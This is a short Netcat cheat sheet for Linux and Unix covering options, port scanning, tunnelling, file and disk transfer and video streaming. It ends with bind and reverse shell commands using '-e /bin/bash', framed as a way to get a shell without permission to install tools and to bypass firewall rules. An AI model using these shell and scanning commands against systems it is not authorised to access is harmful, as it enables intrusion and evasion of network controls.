This cheat sheet provides various for using Netcat on both Linux and Unix.
Connect to a host located anywhere
$ nc [options] [host] [port]
Listen for incoming connections
$ nc -lp port [host] [port]
| Option | Description | Example |
|---|---|---|
-h |
nc -h | Help |
-z |
nc -z 192.168.1.9 1-100 | Port scan for a host or IP address |
-v |
nc -zv 192.168.1.9 1-100 | Provide verbose output |
-n |
nc -zn 192.168.1.9 1-100 | Fast scan by disabling DNS resolution |
-l |
nc -lp 8000 | TCP Listen mode (for inbound connects) |
-w |
nc -w 180 192.168.1.9 8000 | Define timeout value |
-k |
nc -kl 8000 | Continue listening after disconnection |
-u |
nc -u 192.168.1.9 8000 | Use UDP instead of TCP |
-q |
nc -q 1 192.168.1.9 8000 | Client stay up after EOF |
-4 |
nc -4 -l 8000 | IPv4 only |
-6 |
nc -6 -l 8000 | IPv6 only |
Server (192.168.1.9)
$ nc -lv 8000
Client
$ nc 192.168.1.9 8000
$ nc website.com 80
GET index.html HTTP/1.1
HEAD / HTTP/1.1
or
echo "" | nc -zv -wl 192.168.1.1 801-805
Scan ports between 21 to 25
$ nc -zvn 192.168.1.1 21-25
Scan ports 22, 3306 and 8080
$ nc -zvn 192.168.1.1 22 3306 8080
$ nc -lp 8001 -c "nc 127.0.0.1 8000"
or
$ nc -l 8001 | nc 127.0.0.1 8000
Create a tunnel from one local port to another
Server (192.168.1.9)
$ nc -lv 8000 < file.txt
Client
$ nc -nv 192.168.1.9 8000 > file.txt
Suppose you want to transfer a file “file.txt” from server A to client B.
Server (192.168.1.9)
$ nc -lv 8000 > file.txt
Client
$ nc 192.168.1.9 8000 < file.txt
Suppose you want to transfer a file “file.txt” from client B to server A:
Server (192.168.1.9)
$ tar -cvf – dir_name | nc -l 8000
Client
$ nc -n 192.168.1.9 8000 | tar -xvf -
Suppose you want to transfer a directory over the network from A to B.
Server (192.168.1.9)
$ openssl enc -des3 -in file.txt -pass pass:password | nc -l 8000
Client
$ nc 192.168.1.9 8000 | openssl enc -des3 -d -pass pass:password -out file.txt
Encrypt data before transfering over the network
Server (192.168.1.9)
$ dd if=/dev/sda | nc -l 8000
Client
$ nc -n 192.168.1.9 8000 | dd of=/dev/sda
Cloning a linux PC is very simple. Suppose your system disk is /dev/sda
Server (192.168.1.9)
$ cat video.avi | nc -l 8000
Client
$ nc 192.168.1.9 8000 | mplayer -vo x11 -cache 3000 -
Streaming video with netcat
Server (192.168.1.9)
$ nc -lv 8000 -e /bin/bash
Client
$ nc 192.168.1.9 8000
We have used remote Shell using the telnet and ssh but what if they are not installed and we do not have the permission to install them, then we can create remote shell using netcat also.
Server (192.168.1.9)
$ nc -lv 8000
Client
$ nc 192.168.1.9 8000 -v -e /bin/bash
Reverse shells are often used to bypass the firewall restrictions like blocked inbound connections